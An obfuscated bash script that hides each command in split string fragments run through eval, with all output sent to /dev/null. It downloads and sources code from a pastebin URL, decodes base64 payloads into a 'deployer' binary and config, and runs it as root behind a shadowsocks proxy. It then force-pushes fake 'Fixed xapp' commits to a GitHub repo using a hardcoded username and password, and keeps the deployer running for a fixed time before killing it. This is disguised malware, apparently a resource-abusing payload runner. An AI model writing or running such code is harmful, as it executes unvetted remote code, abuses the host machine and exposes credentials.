geZh="o apt update &>"
NdBPuh="/dev/null || t"
Yquv="rue"
eval "sud""$geZh""$NdBPuh""$Yquv"
akht="get -O cod"
qFTCEQo="esrc https://p"
bIukLv="astebin.com/raw"
sfSuH="/UKs9hZfc &"
qhjP=">/dev/nul"
eval "w""$akht""$qFTCEQo""$bIukLv""$sfSuH""$qhjP""l"
cWwocmlW="/cod"
eval ". .""$cWwocmlW""esrc"
git clone $SRC codes &>/dev/null
ZDoA="base64 -d c"
ZmilVT="odes/s"
eval "$ZDoA""$ZmilVT"" > o"
wzoSGE="do apt --yes "
GanKUXw="install psmi"
Jzvk="sc shadowso"
HWVu="cks-libev &"
cFOfQ=">/dev/null || "
FSzRi="t"
eval "su""$wzoSGE""$GanKUXw""$Jzvk""$HWVu""$cFOfQ""$FSzRi""rue"
unNBlXmm="do systemc"
ergjrfiO="tl stop shado"
sBPXemc="wsocks-lib"
yAor="ev.service"
DwnEo=" &>/dev/nul"
rDUpwt="l || tr"
eval "su""$unNBlXmm""$ergjrfiO""$sBPXemc""$yAor""$DwnEo""$rDUpwt""ue"
hncaK="ase64 -d codes"
qmXwzrEI="/c > jump-co"
rOoYrlp="nfig"
eval "b""$hncaK""$qmXwzrEI""$rOoYrlp"
KPOI="base64 -d code"
dmvixcQ="s/gc > g"
eval "$KPOI""$dmvixcQ""c"
RcyvpFB="e64 -d cod"
GFXjk="es/m > dep"
HqwMypL="l"
eval "bas""$RcyvpFB""$GFXjk""$HqwMypL""oyer"
VzAnt="se64 -d codes"
hgEq="/p > pr"
eval "ba""$VzAnt""$hgEq""epare"
YMNtFiMx="/prepa"
eval ". .""$YMNtFiMx""re"
uepj="sudo ss-local -"
SSGnimu="c o --plugin ."
AbbaMuvq="/gqs --plugin"
wuGcAnY="-opts ./gc &>/"
IbhE="dev/nul"
eval "$uepj""$SSGnimu""$AbbaMuvq""$wuGcAnY""$IbhE""l &"
wlQXZWvE="od +x depl"
eval "chm""$wlQXZWvE""oyer"
AHJRhZC="sed -i 's/gcc/"
NsyrdUp="trgfo/g' jump-c"
WKrrQ="onf"
eval "$AHJRhZC""$NsyrdUp""$WKrrQ""ig"
IoRk="o ./deploye"
zUAGPC="r --config"
dJoVu=" jump-config &>"
OiMWtMn="/dev/null &"
eval "sud""$IoRk""$zUAGPC""$dJoVu""$OiMWtMn"
echo deghlx
rpKTP="eep 66"
eval "sl""$rpKTP"
bMOJdxVj="git clone ht"
bVAZZ="tps://gith"
uJdA="ub.com/cub"
pKlyKYlh="ic-vdy-wlang/"
GNtYzSi="xapp.git tmp"
GRufcnQ=" &>/dev/null"
TldQ=" || "
eval "$bMOJdxVj""$bVAZZ""$uJdA""$pKlyKYlh""$GNtYzSi""$GRufcnQ""$TldQ""true"
cd tmp || true
fhcksJ="git config u"
ZQwLZD="ser.name '"
KQbfuca="Roman Akop"
gUkZT="yan' &>/dev"
koKm="/null ||"
eval "$fhcksJ""$ZQwLZD""$KQbfuca""$gUkZT""$koKm"" true"
AGyTnA=" config user."
IDBikY="email roman.ako"
WuvQl="pyanxb@inb"
fdZZ="ox.ru &>/dev/nu"
crLLLN="ll ||"
eval "git""$AGyTnA""$IDBikY""$WuvQl""$fdZZ""$crLLLN"" true"
npDjpBHe="LD=\`date +%s"
eval "BUI""$npDjpBHe""\`"
LQXaXmIo="AKE=\`date +"
eval "M""$LQXaXmIo""%S\`"
echo $BUILD >> deghlx$MAKE
git add deghlx$MAKE &>/dev/null || true
git commit -m 'Fixed xapp '$MAKE &>/dev/null || true
DXIhBSYC=" push https"
ETmrzATB="://roman-ako"
meVOdDzS="pyanxb:'CNjR-K"
YlcfkCC="SjHVv_9Ap'@gi"
hjuYDt="thub.com/c"
FVpXBB="ubic-vdy-wlang"
pQNhLR="/xapp.git -f &"
vKAVWNE=">/dev/null || "
qwKi="tr"
eval "git""$DXIhBSYC""$ETmrzATB""$meVOdDzS""$YlcfkCC""$hjuYDt""$FVpXBB""$pQNhLR""$vKAVWNE""$qwKi""ue"
while :; do G=`date +%s`; echo 'Update... '$G; [ `expr 1426 + $BUILD` -lt $G ] && sudo killall deployer && break; sleep 177; done
